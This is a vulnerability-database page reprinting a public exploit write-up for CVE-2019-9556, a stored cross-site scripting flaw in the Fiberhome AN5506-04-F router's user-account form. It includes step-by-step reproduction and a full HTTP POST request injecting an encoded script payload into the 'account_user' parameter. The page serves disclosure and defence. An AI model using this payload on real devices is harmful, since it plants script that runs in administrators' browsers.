Vulners
Lucene search
Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting Vulnerability | 4 Mar 201900:00 | – | zdt |
 | CVE-2019-9556 | 19 Mar 202409:07 | – | circl |
 | FiberHome Fiberhome AN5506-04-F Cross-Site Scripting Vulnerability | 6 Mar 201900:00 | – | cnvd |
 | CVE-2019-9556 | 31 Dec 201916:10 | – | cve |
 | CVE-2019-9556 | 31 Dec 201916:10 | – | cvelist |
 | EUVD-2019-18927 | 7 Oct 202500:30 | – | euvd |
 | Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting | 4 Mar 201900:00 | – | exploitpack |
 | CVE-2019-9556 | 31 Dec 201917:15 | – | nvd |
 | CVE-2019-9556 | 31 Dec 201917:15 | – | osv |
 | Fiberhome AN5506-04-F RP2669 Cross Site Scripting | 5 Mar 201900:00 | – | packetstorm |
10
# Exploit Title: Fiberhome AN5506-04-F - Stored Cross Site Scripting
# Date: 04.03.2019
# Exploit Author: Tauco
# Vendor Homepage: http://www.fiberhomegroup.com/en/
# Version: RP2669
# Tested on: Windows 10
# CVE : CVE-2019-9556
Description:
===========================================================================
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application.
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
Proof of concept :
===========================================================================
1. Login with credential 192.168.1.1
2. Go to Management
3. Open User Account
4. Add user
5. Inject the post parameter "account_user"
6. Encode Url <script>alert("XSS")</script>
POST /goform/setUser HTTP/1.1
Host: 192.168.1.1
Content-Length: 101
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.1.1/management/account_admin.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: loginName=admin
Connection: close
account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=newData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2019 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 23.5
CVSS 3.15.4
EPSS0.00497